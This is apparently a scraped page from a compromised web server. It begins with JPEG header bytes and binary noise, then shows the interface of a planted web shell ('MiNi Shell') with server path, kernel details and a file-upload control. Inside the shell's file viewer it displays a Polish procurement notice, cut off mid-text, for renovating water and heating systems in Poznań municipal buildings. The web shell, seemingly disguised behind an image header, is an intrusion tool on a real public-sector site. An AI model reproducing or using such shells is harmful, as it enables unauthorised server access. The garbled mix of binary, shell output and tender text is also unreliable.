JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221011/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221011/0038586301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach komunalnych w Poznaniu w podziale na 5 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD KOMUNALNYCH ZASOBÓW LOKALOWYCH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 302538131</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Matejki 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-770</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">obsluga.klienta@zkzl.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zkzl.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach komunalnych w Poznaniu w podziale na 5 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-716b0113-488d-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00385863</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zkzl_poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem https://platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zkzl_poznan<br/>2. W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami<br/>w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem Platformy zakupowej Zamawiającego: https://platformazakupowa.pl/pn/zkzl_poznan i<br/>formularza „Wyślij wiadomość do zamawiającego” dostępnego na stronie dotyczącej danego postępowania.<br/>3. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>Platformy Zakupowej, określone w Regulaminie zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący. Korzystanie z platformy<br/>zakupowej przez Wykonawcę jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Występuje limit objętości plików lub<br/>spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości<br/>150 MB. W przypadku większych plików zalecamy skorzystać z instrukcji pakowania plików dzieląc je na mniejsze paczki po np. 150<br/>MB każda. Składając ofertę zaleca się zaplanowanie złożenia jej z wyprzedzeniem minimum 24h, aby zdążyć w terminie<br/>przewidzianym na jej złożenie w przypadku siły wyższej, jak np. awaria platformazakupowa.pl, awaria Internetu, problemy techniczne<br/>związane z brakiem np. aktualnej przeglądarki, itp. Za datę przekazania oferty lub wniosków przyjmuje się datę ich przekazania w<br/>systemie poprzez kliknięcie przycisku Złóż ofertę w drugim kroku i wyświetlaniu komunikatu, że oferta została złożona.<br/>2. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące<br/>specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za<br/>pośrednictwem platformazakupowa.pl, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>3. Zalecane formaty przesyłanych danych, tj. plików o wielkości do 75 MB - zalecany format: .pdf<br/>4. Sporządzanie i przekazywanie informacji w tym dokumentów elektronicznych musi być zgodne z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie.<br/>5. Za datę przekazania składanych dokumentów, oświadczeń, wniosków (innych niż wnioski o dopuszczenie do udziału w<br/>postępowaniu), zawiadomień, zapytań oraz przekazywanie informacji uznaje się kliknięcie przycisku „Wyślij wiadomość do<br/>zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Komunikacja poprzez Wyślij<br/>wiadomość umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników). Występuje limit<br/>objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów przy maksymalnej sumarycznej wielkości<br/>500 MB.<br/>6. Wszelką korespondencję związaną z niniejszym postępowaniem należy przekazywać za pośrednictwem Platformy Zakupowej.<br/>Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda<br/>ze stron na żądanie drugiej strony niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>7. W sytuacjach awaryjnych, np. w przypadku awarii Platformy, Zamawiający dopuszcza również możliwość komunikowania się z<br/>wykonawcami za pośrednictwem poczty elektronicznej: obsluga.klienta@zkzl.poznan.pl z tym zastrzeżeniem, iż oferta, w tym<br/>oświadczenia, o których mowa w Rozdziale VIII pkt 1 mogą zostać przekazane wyłącznie za pomocą powyższej Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ZKZL Sp. z o. o. z siedzibą w Poznaniu przy ul. Matejki 57, 60-770 Poznań przetwarza<br/>dane zawarte w ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu, znajdujące się w publicznie dostępnych Prawo<br/>zamówień publicznych (dalej „ustawa PZP). Wśród tych informacji mogą pojawić się dane, które mają charakter danych osobowych.<br/>W świetle powyższego ZKZL informuje, że:<br/>1. Administratorem danych osobowych (dalej: „Administrator”) jest Zarząd Komunalnych Zasobów Lokalowych Sp. z o.o. z siedzibą<br/>w Poznaniu przy ul. Matejki 57, 60-770 Poznań (dalej ZKZL), wpisany do Krajowego Rejestru Sądowego pod numerem KRS:<br/>0000483352, posiadającym: NIP: 2090002942, Regon: 302538131. W toku postępowania w sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych na adres: IOD ZKZL, 60-770 Poznań, ul. Matejki 57 lub e-mail:<br/>iod@zkzl.poznan.pl.<br/>2. Dane osobowe zawarte w ofertach są przetwarzane w celu wypełnienia obowiązków prawnych ciążących na administratorze w<br/>związku z przeprowadzeniem postępowania o udzielenia zamówienia publicznego na podstawie ustawy PZP oraz przepisów<br/>wykonawczych. Administrator prowadzi zarówno w imieniu własnym oraz w imieniu i na rzecz jednostek administracji publicznej<br/>postępowania o udzielenie zamówienia publicznego na podstawie przepisów prawa. Przetwarzanie danych osobowych na potrzeby<br/>ww. postępowań mieści się w zakresie działalności statutowej ZKZL. Przetwarzanie tych danych jest niezbędne, aby ZKZL mógł<br/>prawidłowo wypełniać nałożone na niego obowiązki.<br/>3. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia w sposób gwarantujący nienaruszalność. Jeżeli jednak okres obowiązywania umowy w<br/>sprawie zamówienia publicznego przekracza 4 lata, Administrator jako zamawiający będzie przechowywał protokół postępowania<br/>wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. W przypadku zamówień<br/>współfinansowanych ze środków UE dane osobowe będą przetwarzane przez okres, o którym mowa w art. 125 ust. 4 lit. d) w zw. z<br/>art. 140 rozporządzenia nr 1303/2013.<br/>4. Odbiorcą Pani/Pana danych osobowych mogą być podmioty następujących kategorii:<br/>1) podmioty publiczne upoważnione na podstawie obowiązujących przepisów prawa, w tym osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy PZP;<br/>2) podmioty świadczące usługi informatyczne działający na zlecenie Administratora;<br/>3) podmioty świadczące usługi pocztowe, działające na zlecenie Administratora;<br/>4) radcowie prawni i pozostałe podmioty świadczące usługi prawne, działające na zlecenie Administratora;<br/>5) osoby upoważnione do przetwarzania danych osobowych w imieniu Administratora.<br/>5. W związku z tym, że przetwarzamy Pani/Pana dane osobowe, posiada Pani/Pan prawo do:<br/>1) dostępu do danych osobowych na podstawie art. 15 RODO;<br/>2) sprostowania Pani/Pana danych osobowych na podstawie art. 16 RODO;<br/>3) żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO;<br/>4) Jeżeli uznają Państwo, że Państwa dane osobowe są przetwarzane niezgodnie z wymogami prawa, przysługuje Państwu prawo<br/>wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa,<br/>https://www.uodo.gov.pl/).<br/>6. Dane udostępnione przez Panią/Pana nie podlegają profilowaniu, o którym mowa w art. 22 RODO.<br/>7. Administrator danych nie przekazuje danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>8. Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach prawa.<br/>Konsekwencją nieujawnienia danych będzie brak możliwości uczestniczenia w postępowaniu o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest obowiązek prawny Administratora (art. 6 ust. 1 lit. c RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.201.79.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach w Poznaniu w podziale na części, tj.:<br/>1)	Część 1 – ul. Dąbrowskiego 116, 120 <br/>Przedmiot Zamówienia dla każdej Części obejmuje w szczególności:<br/>1)	opracowanie na podstawie Programu Funkcjonalno-Użytkowego (zwanego dalej PFU) Projektu technicznego obejmującego: specyfikację techniczną wykonania i odbioru robót oraz inne dokumenty wskazane w PFU wraz z uzyskaniem, warunków, uzgodnień i pozwoleń, niezbędnych do sporządzenia Projektu,<br/>2)	uzyskanie na podstawie Projektu technicznego, o którym mowa w pkt 1 powyżej, zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych,<br/>3)	pełnienie czynności nadzoru autorskiego nad realizacją robót, stanowiących przedmiot Umowy w zakresie sporządzonej w ramach przedmiotu Umowy Dokumentacji, zwanym dalej Nadzorem autorskim,<br/>4)	wykonanie robót na podstawie Dokumentacji oraz wykonanie dokumentacji powykonawczej, o której mowa w § 8 ust. 6 pkt 4 lit. a Umowy (zwana dalej Dokumentacją Powykonawczą).<br/>Wykonawca zobowiązuje się do kompleksowego wykonania i oddania przedmiotu Zamówienia, w szczególności zgodnie z zapisami Umowy, złożoną ofertą, dokumentami udostępnionymi Wykonawcy w procedurze o udzielenie zamówienia publicznego, Specyfikacją Warunków Zamówienia, zwaną dalej ,,SWZ”, a w zakresie wykonania robót zgodnie z Dokumentacją <br/>i ostateczną decyzją o pozwoleniu na budowę, zasadami wiedzy technicznej i sztuki budowlanej oraz właściwymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą w danej części zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium:<br/><br/>Lp.	Opis kryterium oceny	Waga kryterium (%)<br/>I.	Cena brutto oferty 90 %<br/>II.	Okres gwarancji na wykonane roboty budowlane w miesiącach 10 %<br/>	Sposób przyznawania punktów:<br/>Kryterium I – Cena<br/>C - cena brutto oferty = maksymalnie 90 punktów<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>C=(C_min/C_bad )*90<br/>gdzie:<br/>C ilość punktów oferty badanej w kryterium cena brutto oferty,<br/>Cmin najniższa cena spośród ofert badanych niepodlegających odrzuceniu (brutto),<br/>Cbad cena oferty badanej (brutto).<br/>Podstawą przyznania punktów w kryterium „cena brutto oferty” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ.<br/><br/>Kryterium II – Okres gwarancji na wykonane roboty budowlane w miesiącach <br/>G – okres gwarancji na wykonane roboty budowlane w miesiącach = maksymalnie 10 punktów<br/>Gwarancja będzie oceniana metodą punktową wg wzoru:<br/>G=(G_bad/G_max )*10<br/>gdzie:<br/>G ilość punktów oferty badanej w kryterium okres gwarancji na wykonane roboty budowlane<br/>Gbad gwarancja oferty badanej<br/>Gmax najwyższa gwarancja spośród ofert badanych niepodlegających odrzuceniu (maksymalnie 60 miesięcy)<br/>Punkty przyznane w kryterium „Okres gwarancji na wykonane roboty budowlane <br/>w miesiącach ” zostaną wyliczone według poniższych zasad: (dostosować do ZP) <br/>	Minimalny okres gwarancji wynosi 36 miesięcy liczony od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji lub nie wpisaniu w formularzu ofertowym okresu udzielanej gwarancji oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 w zw. z art. 266 ustawy PZP.<br/>	Maksymalny punktowany przez Zamawiającego okres gwarancji wynosi 60 miesięcy od dnia podpisania Protokołu Odbioru Końcowego Robót. W przypadku zaoferowania przez Wykonawcę dłuższego okresu gwarancji do oceny w ramach danego kryterium Zamawiający przyjmie okres 60 miesięcy. <br/>	W przypadku gdy którykolwiek z Wykonawców zaoferuje okres gwarancji dłuższy niż 60 miesięcy Zamawiający do obliczenia punktacji wszystkich Wykonawców przyjmie maksymalny okres gwarancji (Gmax) równy 60 miesięcy.<br/>	Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty jedynie spośród ofert niepodlegających odrzuceniu. <br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punktów <br/>w poszczególnych kryteriach oceny ofert. <br/>	W toku badania i oceny ofert Zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji instalacji wodno-kanalizacyjnych i centralnego ogrzewania w budynkach w Poznaniu w podziale na części, tj.:<br/>2)	Część 2 – ul. Galla 3, 3a, 5<br/>Przedmiot Zamówienia dla każdej Części obejmuje w szczególności:<br/>1)	opracowanie na podstawie Programu Funkcjonalno-Użytkowego (zwanego dalej PFU) Projektu technicznego obejmującego: specyfikację techniczną wykonania i odbioru robót oraz inne dokumenty wskazane w PFU wraz z uzyskaniem, warunków, uzgodnień i pozwoleń, niezbędnych do sporządzenia Projektu,<br/>2)	uzyskanie na podstawie Projektu technicznego, o którym mowa w pkt 1 powyżej, zaświadczenia o braku sprzeciwu właściwego organu co do zgłoszenia rozpoczęcia robót budowlanych,<br/>3)	pełnienie czynności nadzoru autorskiego nad realizacją robót, stanowiących przedmiot Umowy w zakresie sporządzonej w ramach przedmiotu Umowy Dokumentacji, zwanym dalej Nadzorem autorskim,<br/>4)	wykonanie robót na podstawie Dokumentacji oraz wykonanie dokumentacji powykonawczej, o której mowa w § 8 